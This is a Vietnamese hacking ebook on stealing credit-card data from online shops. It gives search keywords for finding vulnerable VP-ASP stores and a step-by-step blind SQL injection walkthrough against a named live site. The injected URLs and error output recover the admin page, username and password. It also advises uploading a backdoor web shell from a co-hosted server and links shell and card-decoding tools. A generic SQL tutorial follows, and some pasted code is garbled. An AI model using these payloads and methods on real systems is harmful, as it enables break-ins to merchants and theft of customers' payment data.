Credit Card Hacking Version 2
Tài liệu giới thiệu một hình thức hack dựa vào lỗ hổng bảo mật của MSSQL, dựa vào lỗ hổng này chúng ta áp dụng những đoạn mã để khai thác và tìm kiếm được thông tin từ Database của server đó.
------+++-----
Ebook Hacking Credit Card Version 2 – Lastest And The End.
Hack chỉ là để học hỏi và trao dồi kĩ năng bảo mật.
Title : Credit Card Should Stop
======
Author: hieupc
Email: [email protected]
Yahoo: [email protected]
Website: http://thegioiebook.com
=============================
Sau khi hieupc hoàn thành phiên bản 1, hieupc cũng đã nghĩ ngay đến phiên bản 2 của
Ebook Hacking Credit Card. Và phiên bản Ebook mới này sẽ hoàn thiện và lắp đi những
thiếu sót tồn tại ở Ebook cũ.
Tutorial đáng chú ý nhất trong Ebook này.
Hacking Credit Card – Sql Blind V.1 (Power by Tieuquainho)
Có một bài viết nằm trong Ebook Hacking Credit Card version 1, có cách hack giống
cách này nhưng có vẻ đây là bài viết đầy đủ nhất.
Xin giới thiệu sơ qua SQL Blind :
• Đây là hình thức khai thác dựa vào lỗ hổng bảo mật của MSSQL, dựa vào lỗ hổng này
chúng ta áp dụng những đoạn mã để khai thác và tìm kiếm được thông tin từ Database
của Server đó. SQL Blind là kiểu khai thác dò tìm từng ký tự, khi các bạn đã sử dụng đa
số các thao thác kỹ thuật hack SQL khác mà không thành công thì có thể tạm nói SQL
Blind này có thề khai thông những bế tắc đó, tuy nhiên bên mặt tốt luôn có mặt không tốt
đó là quá trình truy vấn SQL Blind tốn rất nhiều thời gian và công sức bởi vì các bạn phải
tìm từng ký tự một trong chuỗi cần tìm . VD: tìm link admin thì các bạn phải tìm từng
chữ trong chuỗi Database về link admin và ghép chúng lại thành 1 chuỗi. Nói nhiều các
bạn rối thôi làm liền cho chắc dễ hiểu.
Chuẩn bị :
- Trình duyệt Web Opera, Mozila Firefor v1.3 hoặc loại khác Internet Explorer là ok.
Không nên xài Internet Explorer để Hack (^|^)
- 1 ly nước và 1 cái khăn lau mặt để chữa cháy & lau mồ hôi.
Mục tiêu:
- Tất cả các Phiên bản từ 5.0 trở về trước của VP-ASP (loại shop tương đối nhiều lỗi và
nhiều cc chết (^|^))
- Các Tìm những Shop VP-ASP này thì có thể tham khỏa những từ khóa bên dưới dùng
cho việc search trên Google, Yahoo … một site tìm kiếm bất kì nào đó.
- Từ Khóa :
+ shopdisplayproducts.asp?id
+ shopaddtocart.asp?catalogid=
- Tôi chỉ đưa ra 2 từ khóa đó bởi vì nó là những mục tiêu chính giúp 1 trang tìm kiếm có
thể tìm ra được VP-ASP.
Chúng ta bắt đâu hack 1 site demo nha
Mục tiêu là hxxps://circleathletics.com/ (sử dụng VP-ASP V5.0)
- đầu tiên chúng ta tìm link admin của site này
-
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f
ieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20
and%20left(fieldvalue,1)='a')
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'clng'
/shop/shopproductfeatures.asp, line 139
Như vậy có nghĩa là từ khóa chúng ta đưa ra (a) không phải là ký tự đâu tiên trong chuỗi
link admin, chúng ta chợt suy nghĩ đên link admin thường là shopadmin.asp … thử với
câu lênh sau thay chữ a = s
-
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f
ieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20
and%20left(fieldvalue,1)='s')
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value 'xadminpage' to a column of data type int.
/shop/shop$db.asp, line 409
- Chính xác là chữ S là ký tự đâu tien của link admin rồi, chúng ta tiếp tục thế những chữ
khác và tiếp theo
-
hxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fi
eldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20a
nd%20left(fieldvalue,2)='sh')
- Chú ý chỗ này nha (fieldvalue,2)='sh')
- Cú tiếp tục thay tiếp vào đê tìm ra link admin. Link admin kết thúc = .asp nên không
cần tìm xem chuỗi ký tự có bao nhiêu ký tự đâu
Tiếp theo chúng ta tìm user + pass admin
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f
ldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(flduser
name,1)='a')
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'clng'
/shop/shopproductfeatures.asp, line 139
Ko có gì hết tiếp tục như thế
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f
ldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(flduser
name,1)='c')
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value 'circ54' to a column of data type int.
/shop/shop$db.asp, line 409
Hiện luôn User ra luôn site này bị lỗi nặng nếu những site khác các bạn động não 1 tí như
khi tìm link admin là ok hihi
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f
ldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(flduser
name,2)='ab')
đây là cách tìm ký tự thư 2 , thứ 3 thì them vào (fldusername,3)='abc') dậy đó dễ mà.
Chúng ta đã có user admin ở trên rồi circ54 tìm pass của nó
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f
ldpassword%20from%20tbluser%20where%20fldusername='circ54'%20and%20left(fldp
assword,1)='a')
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'clng'
/shop/shopproductfeatures.asp, line 13
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f
ldpassword%20from%20tbluser%20where%20fldusername='circ54'%20and%20left(fldp
assword,1)='2')
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value '2005HCP' to a column of data type int.
/shop/shop$db.asp, line 409
Vậy là đã hack được thằng này rồi hihi quá dễ phải không các bạn
Hy vọng các bạn hiểu mình viết vụng lắm mong mọi người thông cảm
Còn đây là 1 số tham khỏa them
*************(*** Ti`m link admin ***************************************
%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldna
me,10)='xadminpage'%20and%20left(fieldvalue,1)='a') *************** Ti`m pass ************************************************
%20or 1=(select fldpassword from tbluser where fldusername='blue42jh' and
left(fldpassword,1)='a') fldpassword='" & userpassword & "'"
Set rs = myconn.Execute(SQL)
if not rs.eof then
CheckSecondpassword rc
If rc=0 then
GetAdminData rs
else
closerecordset rs
shopclosedatabase myconn
msg=Secondpasswordmsg & ""
end if
else
rs.close
set rs=nothing
LocateSupplier
end if
if msg="" then
msg=LangAdmin01 & ""
end if
Shopclosedatabase myconn
else
msg=LangAdmin01 & ""
Shopclosedatabase myconn
end if
end if
AdminPageHeader
if msg "" Then
response.write getconfig("xfont") & msg & ""
end if
%>
0 then
msg="database Open error" & GetSess("Openerror")
else
If Not rs.EOF Then
setsess "shopadmin" ,request("username")
setsess "admintype","supplier"
setsess "login" , rs("supplieruserid")
setsess("supplierid"),rs("supplierid")
rs.close
set rs=nothing
GetUserTables
' setsess "usertables",rs("tablesallowed")
LogUser GetSess("ShopAdmin"), "in", myconn
Shopclosedatabase myconn
response.redirect "shopadmin1.asp"
else
rs.close
set rs=nothing
end if
end if
end sub
Sub GetUserTables
dim rs
sql = "select * from tbluser where fldusername='supplier'"
Set rs = myconn.Execute(SQL)
if err.number>0 then
msg="database Open error" & GetSess("Openerror")
else
If Not rs.EOF Then
setsess "usertables",rs("tablesallowed")
setsess "adminmenus",rs("fldaccess")
end if
end if
rs.close
set rs=nothing
end sub
Sub Checksecurity (ipassword)
dim tpassword
tpassword=ucase(ipassword)
if tpassword="VPASP" or tpassword="ADMIN" then
setsess "security","Yes"
end if
end sub
'*******************************************************************
' if using second password facility, the validate it
'*******************************************************************
Sub CheckSecondPassword(rc)
dim password
rc=4
If secondpassword="" then
rc=0
exit sub
end if
password=request.form("password2")
if password="" then exit sub
if ucase(password)ucase(secondpassword) then exit sub
rc=0
end sub
%>
Chú ý chỗ chữ đỏ và xanh, đấy là nơi đặt cái pass thứ 2 của shop VPASP. Lúc trước
nobita còn có suy luận rằng cái pass 2 này được thằng VPASP fix và nó nằm trong
database của shop, nhưng cái này không đúng. Từ cách đặt pass 2 thế này, nobita nghĩ
rằng việc làm pass 2 này có thể do thằng webmaster nó edit theo hướng dẫn của VPASP.
Cách đặt pass ở các vị trí có thể khác nhau chẳng hạn:
CODE
ordertracking
prodcategories
prodfeatures
products
projects
quantitydiscounts
registrant
registryitems
reviews
searchresults
shipmethods
pass_access
suppliers
tblaccess
tbllog
tbluser
CHECK_CONSTRAINTS
COLUMN_DOMAIN_USAGE
COLUMN_PRIVILEGES
COLUMNS
CONSTRAINT_COLUMN_USAGE
CONSTRAINT_TABLE_USAGE
DOMAIN_CONSTRAINTS
DOMAINS
KEY_COLUMN_USAGE
REFERENTIAL_CONSTRAINTS
SCHEMATA
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TABLES
VIEW_COLUMN_USAGE
VIEW_TABLE_USAGE
VIEWS
Và cách tìm kiếm này tốn rất nhiều công sức, vì phải tìm đầy đủ các table của nó, mà với
kiểu hack hiện nay thì là đoán mò table, hoặc blind từng ký tự của table .Ngồi cả ngày
chưa chắc đã ra 1 shop. Tuy nhiên đến nay nobita cũng chưa tìm được giải pháp nào tốt
hơn cho loại này .
Mong rằng qua bài viết này sẽ giúp anh em tìm kiếm pass2 được tốt hơn .
Bài viết của hieupc:
Theo kinh nghiệm của hieupc biết được, muốn hack được password thứ 2 của shop (
Secure Pass) thì chỉ có cách hack local là nhanh và gọn nhất, ngoài cách hack local này
bạn có thể dựa theo bài viết kinh nghiệm của nobita để mà lấy được pass 2. Có vẻ việc
hack local trở nên rất dễ khi bạn có một host trong tay, và chỉ cần upload 1 con backdoor
lên chẳng hạn như con remview.php là có thể hack. Tuy nhiên việc này đòi hỏi bạn phải
có kiến thức vững về Hosting và DNS. Bạn muốn biết được shop đó nằm ở server nào
bạn có thể check DNS hoặc IP để định vị, và từ đó bạn lần theo đó mà đăng kí cho mình
1 host cùng host với shop bạn cần lấy pass 2. Còn việc hack local và check DNS thế nào
hay hiểu rõ thêm về host các bạn có thể ghé thăm các trang sau đây để được hướng dẫn
cụ thể: http://viethacker.org , http://hvaonline.net và check DNS, kiểm tra thông tin bạn:
http://pavietnam.net , http://checkdomain.com , http://whoisc.com , http://check-dns.com
. Ngoài ra, còn nhiều trang web khác, bạn có thể lên google.com search.
Remview.php : http://php.spb.ru/remview/remview_2003_10_23.zip
Ngoài ra còn nhiều Mshell, Backdoor khác có thể kiếm trên google.com hoặc qua trang
http://viethacker.org
Decode CC bị mã hóa: http://rapidshare.de/files/8343810/decodecc.rar.html (pass unrar :
thegioiebook.com )
Những bài cần phải đọc để nắm vững kiến thức Hacking Credit Card.
- Giới thiệu về SQL.
Nguồn từ diendantinhoc.net
~~~~~~~~~~~~~~~~~~~~~~~
SQL là chuẩn ngôn ngữ ANSI để truy cập CSDL.
SQL là gì?
SQL là viết tắt của Structured Query Language - Ngôn ngữ truy vấn cấu trúc.
SQL cho phép bạn truy cập vào CSDL.
SQL là một chuẩn ngôn ngữ của ANSI.
SQL có thể thực thi các câu truy vấn trên CSDL.
SQL có thể lấy dữ liệu từ CSDL.
SQL có thể chèn dữ liệu mới vào CSDL.
SQL có thể xoá dữ liệu trong CSDL.
SQL có thể sửa đổi dữ liệu hiện có trong CSDL.
SQL dễ học :-)
SQL là một chuẩn
SQL là một chuẩn của ANSI (American National Standards Institute - Viện tiêu chuẩn
quốc gia Hoa kỳ) về truy xuất các hệ thống CSDL. Các câu lệnh SQL được sử dụng để
truy xuất và cập nhật dữ liệu trong một CSDL.
SQL hoạt động với hầu hết các chương trình CSDL như MS Access, DB2, Informix, MS
SQL Server, Oracle, Sybase v.v...
Lưu ý: Hầu hết các chương trình CSDL hỗ trợ SQL đều có phần mở rộng cho SQL chỉ
hoạt động với chính chương trình đó.
Bảng CSDL
Một CSDL thường bao gồm một hoặc nhiều bảng (table). Mỗi bảng được xác định thông
qua một tên (ví dụ Customers hoặc Orders). Bảng chứa các mẩu tin - dòng (record - row),
là dữ liệu của bảng.
Dưới đây là một ví dụ về một bảng có tên là Persons (người):
LastName FirstName Address City
Hansen Ola Timoteivn 10 Sandnes
Svendson Tove Borgvn 23 Sandnes
Pettersen Kari Storgt 20 Stavanger
Bảng ở trên bao gồm 3 mẩu tin (dòng), mỗi mẩu tin tương ứng với một người, và bốn cột
(LastName, FirstName, Address và City).
Câu truy vấn SQL
Với SQL ta có thể truy vấn CSDL và nhận lấy kết quả trả về thông qua các câu truy vấn.
Một câu truy vấn như sau:
SELECT LastName FROM Persons
Sẽ trả về kết quả như sau:
LastName
Hansen
Svendson
Pettersen
Lưu ý: Một số hệ thống CSDL đòi hỏi câu lệnh SQL phải kết thúc bằng một dấu chấm
phảy (;). Chúng ta sẽ không dùng dấu chấm phảy trong bài viết này.
SQL là ngôn ngữ thao tác dữ liệu (DML - Data Manipulation Language)
SQL là cú pháp để thực thi các câu truy vấn. SQL cũng bao gồm cú pháp để cập nhật -
sửa đổi, chèn thêm và xoá các mẩu tin.
Sau đây là danh sách các lệnh và truy vấn dạng DML của SQL:
SELECT - lấy dữ liệu từ một bảng CSDL.
UPDATE - cập nhật/sửa đổi dữ liệu trong bảng.
DELETE - xoá dữ liệu trong bảng.
INSERT INTO - thêm dữ liệu mới vào bảng.
SQL là ngôn ngữ định nghĩa dữ liệu (DDL - Data Definition Language)
Phần DDL của SQL cho phép tạo ra hoặc xoá các bảng. Chúng ta cũng có thể định nghĩa
các khoá (key), chỉ mục (index), chỉ định các liên kết giữa các bảng và thiết lập các quan
hệ ràng buộc giữa các bảng trong CSDL.
Các lệnh DDL quan trọng nhất của SQL là:
CREATE TABLE - tạo ra một bảng mới.
ALTER TABLE - thay đổi cấu trúc của bảng.
DROP TABLE - xoá một bảng.
CREATE INDEX - tạo chỉ mục (khoá để tìm kiếm - search key).
DROP INDEX - xoá chỉ mục đã được tạo.
-Câu lệnh SELECT
Câu lệnh SELECT được dùng để truy xuất dữ liệu từ một bảng. Kết quả trả về dưới dạng
bảng được lưu trong 1 bảng, gọi là bảng kết quả - result table (còn được gọi là tập kết quả
- result set).
Cú pháp
Cú pháp của câu lệnh SELECT như sau:
SELECT tên_các_cột
FROM tên_bảng
Truy xuất nhiều cột
Để truy xuất các cột mang tên LastName và FirstName, ta dùng một câu lệnh SELECT
như sau:
SELECT LastName, FirstName FROM Persons
Bảng Persons:
LastName FirstName Address City
Hansen Ola Timoteivn 10 Sandnes
Svendson Tove Borgvn 23 Sandnes
Pettersen Kari Storgt 20 Stavanger
Kết quả trả về:
LastName FirstName
Hansen Ola
Svendson Tove
Pettersen Kari
Truy xuất tất cả các cột
Để truy xuất tất cả các cột từ bảng Persons, ta dùng ký hiệu * thay cho danh sách các cột:
SELECT * FROM Persons
Kết quả trả về:
LastName - FirstName- Address -City
Hansen - Ola -Timoteivn 10 - Sandnes
Svendson - Tove -Borgvn 23 - Sandnes
Pettersen -Kari -Storgt 20 -Stavanger
Tập kết quả
Kết quả trả về từ một câu truy vấn SQL được lưu trong 1 tập kết quả (result set). Hầu hết
các hệ thống chương trình CSDL cho phép duyệt qua tập kết quả bằng các hàm lập trình
như Move-To-First-Record, Get-Record-Content, Move-To-Next-Record v.v...
Dấu chẩm phảy (;) phía sau câu lệnh
Dấu chẩm phảy là một cách chuẩn để phân cách các câu lệnh SQL nếu như hệ thống
CSDL cho phép nhiều câu lệnh SQL được thực thi thông qua một lời gọi duy nhất.
Các câu lệnh SQL trong bài viết này đều là các câu lệnh đơn (mỗi câu lệnh là một và chỉ
một lệnh SQL). MS Access và MS SQL Server không đỏi hỏi phải có dấu chấm phảy
ngay sau mỗi câu lệnh SQL, nhưng một số chương trình CSDL khác có thể bắt buộc bạn
phải thêm dấu chấm phảy sau mỗi câu lệnh SQL (cho dù đó là câu lệnh đơn). Xin nhắc
lại, trong bài viết này chúng ta sẽ không dùng dấu chấm phảy ở cuối câu lệnh SQL.
-Mệnh đề WHERE
Để truy xuất dữ liệu trong bảng theo các điều kiện nào đó, một mệnh đề WHERE có thể
được thêm vào câu lệnh SELECT.
Cú pháp
Cú pháp mệnh đề WHERE trong câu lệnh SELECT như sau:
SELECT tên_cột FROM tên_bảng
WHERE tên_cột phép_toán giá_trị
Trong mệnh đề WHERE, các phép toán được sử dụng là
Phép toán Mô tả
= So sánh bằng
So sánh không bằng
> Lớn hơn
< Nhỏ hơn
>= Lớn hơn hoặc bằng
hiển thị một dòng nếu BẤT KỲ điều kiện nào được thoả.
Bảng dữ liệu dùng trong ví dụ
LastName FirstName Address City
Hansen Ola Timoteivn 10 Sandnes
Svendson Tove Borgvn 23 Sandnes
Svendson Stephen Kaivn 18 Sandnes
Ví dụ 1
Sử dụng AND để tìm những người có tên là Tove và họ là Svendson:
SELECT * FROM Persons
WHERE FirstName = 'Tove'
AND LastName = 'Svendson'
Kết quả trả về:
LastName FirstName Address City
Svendson Tove Borgvn 23 Sandnes
Ví dụ 2
Sử dụng OR để tìm những người có tên là Tove hoặc họ là Svendson:
SELECT * FROM Persons
WHERE firstname = 'Tove'
OR lastname = 'Svendson'
Kết quả trả về:
LastName FirstName Address City
Svendson Tove Borgvn 23 Sandnes
Svendson Stephen Kaivn 18 Sandnes
Ví dụ 3
Bạn cũng có thể sử dụng kết hợp AND và OR cùng với dấu ngoặc đơn để tạo nên các câu
truy vấn phức tạp:
SELECT * FROM Persons WHERE
(FirstName = 'Tove' OR FirstName = 'Stephen')
AND LastName = 'Svendson'
Kết quả trả về:
LastName FirstName Address City
Svendson Tove Borgvn 23 Sandnes
Svendson Stephen Kaivn 18 Sandnes
Hansen Ola Timoteivn 10 Sandnes 1951
Svendson Tove Borgvn 23 Sandnes 1978
Svendson Stale Kaivn 18 Sandnes 1980
Pettersen Kari Storgt 20 Stavanger 1960
Kết quả trả về:
LastName FirstName Address City Year
Hansen Ola Timoteivn 10 Sandnes 1951
Svendson Tove Borgvn 23 Sandnes 1978
Svendson Stale Kaivn 18 Sandnes 1980
Sử dụng dấu nháy
Lưu ý rằng ở ví dụ trên ta đã sử dụng hai dấu nháy đơn (') bao quanh giá trị điều kiện
'Sandnes'.
SQL sử dụng dấu nháy đơn bao quanh các giá trị ở dạng chuỗi văn bản (text). Nhiều hệ
CSDL còn cho phép sử dụng dấu nháy kép ("). Các giá trị ở dạng số không dùng dấu
nháy để bao quanh.
Với dữ liệu dạng chuỗi văn bản:
Câu lệnh đúng:
SELECT * FROM Persons WHERE FirstName = 'Tove'
Câu lệnh sai:
SELECT * FROM Persons WHERE FirstName = Tove
Với dữ liệu dạng số:
Câu lệnh đúng:
SELECT * FROM Persons WHERE Year > 1965
Câu lệnh sai:
SELECT * FROM Persons WHERE Year > '1965'
Phép toán điều kiện LIKE
Phép toán LIKE được dùng để tìm kiếm một chuỗi mẫu văn bản trên một cột.
Cú pháp
Cú pháp của phép toán LIKE như sau:
SELECT tên_cột FROM tên_bảng
WHERE tên_cột LIKE mẫu
Một ký hiệu % có thể được sử dụng để định nghĩa các ký tự đại diện. % có thể được đặt
trước và/hoặc sau mẫu.
Sử dụng LIKE
Câu lệnh SQL sau sẽ trả về danh sách những người có tên bắt đầu bằng chữ O:
SELECT * FROM Persons
WHERE FirstName LIKE 'O%'
Câu lệnh SQL sau sẽ trả về danh sách những người có tên kết thúc bằng chữ a:
SELECT * FROM Persons
WHERE FirstName LIKE '%a'
Câu lệnh SQL sau sẽ trả về danh sách những người có tên kết chứa chuỗi la:
SELECT * FROM Persons
WHERE FirstName LIKE '%la%'
Toán tử BETWEEN...AND
lấy ra một miền dữ liệu nằm giữa hai giá trị. Hai giá trị này có thể là số, chuỗi văn bản
hoặc ngày tháng.
SELECT tên_cột FROM tên_bảng
WHERE tên_cột
BETWEEN giá_trị_1 AND giá_trị_2
Bảng dữ liệu dùng trong ví dụ
LastName FirstName Address City
Hansen Ola Timoteivn 10 Sandnes
Nordmann Anna Neset 18 Sandnes
Pettersen Kari Storgt 20 Stavanger